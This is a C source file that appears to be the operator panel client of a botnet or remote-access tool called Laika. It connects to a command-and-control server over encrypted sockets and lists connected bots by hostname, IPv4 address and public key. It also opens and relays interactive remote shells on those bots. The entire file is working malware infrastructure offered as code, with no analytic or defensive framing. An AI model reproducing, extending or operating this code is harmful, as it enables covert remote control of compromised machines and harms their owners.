#include "lmem.h" #include "lerror.h" #include "lpacket.h" #include "lsodium.h" #include "sterm.h" #include "sclient.h" typedef struct sShell_hashMapElem { int id; tShell_peer *peer; uint8_t *pub; } tShell_hashMapElem; int shell_ElemCompare(const void *a, const void *b, void *udata) { const tShell_hashMapElem *ua = a; const tShell_hashMapElem *ub = b; return memcmp(ua->pub, ub->pub, crypto_kx_PUBLICKEYBYTES); } uint64_t shell_ElemHash(const void *item, uint64_t seed0, uint64_t seed1) { const tShell_hashMapElem *u = item; return *(uint64_t*)(u->pub); /* hashes pub key (first 8 bytes) */ } void shellC_handleHandshakeRes(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData) { uint8_t endianness = laikaS_readByte(&peer->sock); peer->sock.flipEndian = endianness != laikaS_isBigEndian(); } void shellC_handleAddPeer(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData) { char hostname[LAIKA_HOSTNAME_LEN], ipv4[LAIKA_IPV4_LEN]; uint8_t pubKey[crypto_kx_PUBLICKEYBYTES]; tShell_client *client = (tShell_client*)uData; tShell_peer *bot; uint8_t type; /* read newly connected peer's pubKey */ laikaS_read(&peer->sock, pubKey, crypto_kx_PUBLICKEYBYTES); /* read hostname & ipv4 */ laikaS_read(&peer->sock, hostname, LAIKA_HOSTNAME_LEN); laikaS_read(&peer->sock, ipv4, LAIKA_IPV4_LEN); /* read peer's peerType */ type = laikaS_readByte(&peer->sock); /* ignore panel clients */ if (type == PEER_AUTH) return; /* create peer */ bot = shellP_newPeer(type, pubKey, hostname, ipv4); /* add peer to client */ shellC_addPeer(client, bot); } void shellC_handleRmvPeer(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData) { uint8_t pubKey[crypto_kx_PUBLICKEYBYTES]; tShell_client *client = (tShell_client*)uData; tShell_peer *bot; uint8_t type; int id; /* read public key & type */ laikaS_read(&peer->sock, pubKey, crypto_kx_PUBLICKEYBYTES); type = laikaS_readByte(&peer->sock); /* ignore panel clients */ if (type == PEER_AUTH) return; if ((bot = shellC_getPeerByPub(client, pubKey, &id)) == NULL) LAIKA_ERROR("LAIKAPKT_AUTHENTICATED_RMV_PEER_RES: Unknown peer!\n"); /* remove peer */ shellC_rmvPeer(client, bot, id); } void shellC_handleShellData(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData) { uint8_t buf[LAIKA_SHELL_DATA_MAX_LENGTH]; tShell_client *client = (tShell_client*)uData; /* sanity check */ if (client->openShell == NULL) LAIKA_ERROR("LAIKAPKT_AUTHENTICATED_SHELL_DATA: No shell open!\n"); laikaS_read(&peer->sock, buf, sz); shellT_writeRawOutput(buf, sz); } void shellC_handleShellClose(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData) { tShell_client *client = (tShell_client*)uData; /* sanity check */ if (client->openShell == NULL) LAIKA_ERROR("LAIKAPKT_AUTHENTICATED_SHELL_DATA: No shell open!\n"); /* close shell */ shellC_closeShell(client); } struct sLaika_peerPacketInfo shellC_pktTbl[LAIKAPKT_MAXNONE] = { LAIKA_CREATE_PACKET_INFO(LAIKAPKT_HANDSHAKE_RES, shellC_handleHandshakeRes, sizeof(uint8_t), false), LAIKA_CREATE_PACKET_INFO(LAIKAPKT_AUTHENTICATED_ADD_PEER_RES, shellC_handleAddPeer, crypto_kx_PUBLICKEYBYTES + LAIKA_HOSTNAME_LEN + LAIKA_IPV4_LEN + sizeof(uint8_t), false), LAIKA_CREATE_PACKET_INFO(LAIKAPKT_AUTHENTICATED_RMV_PEER_RES, shellC_handleRmvPeer, crypto_kx_PUBLICKEYBYTES + sizeof(uint8_t), false), LAIKA_CREATE_PACKET_INFO(LAIKAPKT_AUTHENTICATED_SHELL_DATA, shellC_handleShellData, 0, true), LAIKA_CREATE_PACKET_INFO(LAIKAPKT_AUTHENTICATED_SHELL_CLOSE, shellC_handleShellClose, 0, false), }; void shellC_init(tShell_client *client) { size_t _unused; laikaP_initPList(&client->pList); client->peer = laikaS_newPeer( shellC_pktTbl, &client->pList, (void*)client ); client->peers = hashmap_new(sizeof(tShell_hashMapElem), 8, 0, 0, shell_ElemHash, shell_ElemCompare, NULL, NULL); client->openShell = NULL; client->peerTbl = NULL; client->peerTblCap = 4; client->peerTblCount = 0; /* load authenticated keypair */ if (sodium_init() < 0) { shellC_cleanup(client); LAIKA_ERROR("LibSodium failed to initialize!\n"); } if (sodium_hex2bin(client->pub, crypto_kx_PUBLICKEYBYTES, LAIKA_PUBKEY, strlen(LAIKA_PUBKEY), NULL, &_unused, NULL) != 0) { shellC_cleanup(client); LAIKA_ERROR("Failed to init public key!\n"); } if (sodium_hex2bin(client->priv, crypto_kx_SECRETKEYBYTES, LAIKA_PRIVKEY, strlen(LAIKA_PRIVKEY), NULL, &_unused, NULL) != 0) { shellC_cleanup(client); LAIKA_ERROR("Failed to init private key!\n"); } /* read cnc's public key into peerPub */ if (sodium_hex2bin(client->peer->peerPub, crypto_kx_PUBLICKEYBYTES, LAIKA_PUBKEY, strlen(LAIKA_PUBKEY), NULL, &_unused, NULL) != 0) { shellC_cleanup(client); LAIKA_ERROR("Failed to init cnc public key!\n"); } } void shellC_cleanup(tShell_client *client) { int i; laikaS_freePeer(client->peer); laikaP_cleanPList(&client->pList); hashmap_free(client->peers); /* free peers */ for (i = 0; i < client->peerTblCount; i++) { if (client->peerTbl[i]) shellP_freePeer(client->peerTbl[i]); } laikaM_free(client->peerTbl); } void shellC_connectToCNC(tShell_client *client, char *ip, char *port) { struct sLaika_socket *sock = &client->peer->sock; /* create encryption keys */ if (crypto_kx_client_session_keys(client->peer->inKey, client->peer->outKey, client->pub, client->priv, client->peer->peerPub) != 0) LAIKA_ERROR("failed to gen session key!\n"); /* setup socket */ laikaS_connect(sock, ip, port); laikaS_setNonBlock(sock); laikaP_addSock(&client->pList, sock); /* queue handshake request */ laikaS_startOutPacket(client->peer, LAIKAPKT_HANDSHAKE_REQ); laikaS_write(sock, LAIKA_MAGIC, LAIKA_MAGICLEN); laikaS_writeByte(sock, LAIKA_VERSION_MAJOR); laikaS_writeByte(sock, LAIKA_VERSION_MINOR); laikaS_write(sock, client->pub, sizeof(client->pub)); /* write public key */ /* write stub hostname & ipv4 (since we're a panel/dummy client, cnc doesn't need this information really) */ laikaS_zeroWrite(sock, LAIKA_HOSTNAME_LEN); laikaS_zeroWrite(sock, LAIKA_IPV4_LEN); laikaS_endOutPacket(client->peer); laikaS_setSecure(client->peer, true); /* after our handshake, all packet bodies are encrypted */ /* queue authenticated handshake request */ laikaS_startOutPacket(client->peer, LAIKAPKT_AUTHENTICATED_HANDSHAKE_REQ); laikaS_writeByte(sock, PEER_AUTH); laikaS_endOutPacket(client->peer); /* the handshake requests will be sent on the next call to shellC_poll */ } void shellC_flushQueue(tShell_client *client) { /* flush pList's outQueue */ if (client->pList.outCount > 0) { if (!laikaS_handlePeerOut(client->peer)) laikaS_kill(&client->peer->sock); laikaP_resetOutQueue(&client->pList); } } bool shellC_poll(tShell_client *client, int timeout) { struct sLaika_pollEvent *evnt; int numEvents; /* flush any events prior (eg. made by a command handler) */ shellC_flushQueue(client); evnt = laikaP_poll(&client->pList, timeout, &numEvents); if (numEvents == 0) /* no events? timeout was reached */ return false; LAIKA_TRY if (evnt->pollIn && !laikaS_handlePeerIn(client->peer)) goto _CLIENTKILL; if (evnt->pollOut && !laikaS_handlePeerOut(client->peer)) goto _CLIENTKILL; if (!evnt->pollIn && !evnt->pollOut) /* not a pollin or pollout event, must be an error */ goto _CLIENTKILL; LAIKA_CATCH _CLIENTKILL: laikaS_kill(&client->peer->sock); LAIKA_TRYEND /* flush any events after (eg. made by a packet handler) */ shellC_flushQueue(client); return true; } tShell_peer *shellC_getPeerByPub(tShell_client *client, uint8_t *pub, int *id) { tShell_hashMapElem *elem = (tShell_hashMapElem*)hashmap_get(client->peers, &(tShell_hashMapElem){.pub = pub}); /* return peer if elem was found, otherwise return NULL */ if (elem) { *id = elem->id; return elem->peer; } else { *id = -1; return NULL; } } int shellC_addPeer(tShell_client *client, tShell_peer *newPeer) { /* find empty ID */ int id; for (id = 0; id < client->peerTblCount; id++) { if (client->peerTbl[id] == NULL) /* it's empty! */ break; } /* if we didn't find an empty id, grow the array */ if (id == client->peerTblCount) { laikaM_growarray(tShell_peer*, client->peerTbl, 1, client->peerTblCount, client->peerTblCap); client->peerTblCount++; } /* add to peer lookup table */ client->peerTbl[id] = newPeer; /* insert into hashmap */ hashmap_set(client->peers, &(tShell_hashMapElem){.id = id, .pub = newPeer->pub, .peer = newPeer}); /* let user know */ shellT_printf("\nNew peer connected to CNC:\n"); shellC_printInfo(newPeer); return id; } void shellC_rmvPeer(tShell_client *client, tShell_peer *oldPeer, int id) { /* remove from bot tbl */ client->peerTbl[id] = NULL; /* remove peer from hashmap */ hashmap_delete(client->peers, &(tShell_hashMapElem){.pub = oldPeer->pub, .peer = oldPeer}); shellT_printf("\nPeer disconnected from CNC:\n"); shellC_printInfo(oldPeer); /* finally, free peer */ shellP_freePeer(oldPeer); } void shellC_openShell(tShell_client *client, tShell_peer *peer) { /* check if we already have a shell open */ if (client->openShell) return; /* send SHELL_OPEN request */ laikaS_startOutPacket(client->peer, LAIKAPKT_AUTHENTICATED_SHELL_OPEN_REQ); laikaS_write(&client->peer->sock, peer->pub, sizeof(peer->pub)); laikaS_endOutPacket(client->peer); client->openShell = peer; } void shellC_closeShell(tShell_client *client) { /* check if we have a shell open */ if (client->openShell == NULL) return; /* send SHELL_CLOSE request */ laikaS_emptyOutPacket(client->peer, LAIKAPKT_AUTHENTICATED_SHELL_CLOSE); client->openShell = NULL; } void shellC_sendDataShell(tShell_client *client, uint8_t *data, size_t sz) { /* check if we have a shell open */ if (client->openShell == NULL) return; laikaS_startVarPacket(client->peer, LAIKAPKT_AUTHENTICATED_SHELL_DATA); laikaS_write(&client->peer->sock, data, sz); laikaS_endVarPacket(client->peer); } void shellC_printInfo(tShell_peer *peer) { char buf[128]; sodium_bin2hex(buf, sizeof(buf), peer->pub, crypto_kx_PUBLICKEYBYTES); shellT_printf("\t%s@%s\n\tTYPE: %s\n\tPUBKEY: %s\n", peer->hostname, peer->ipv4, shellP_typeStr(peer), buf); }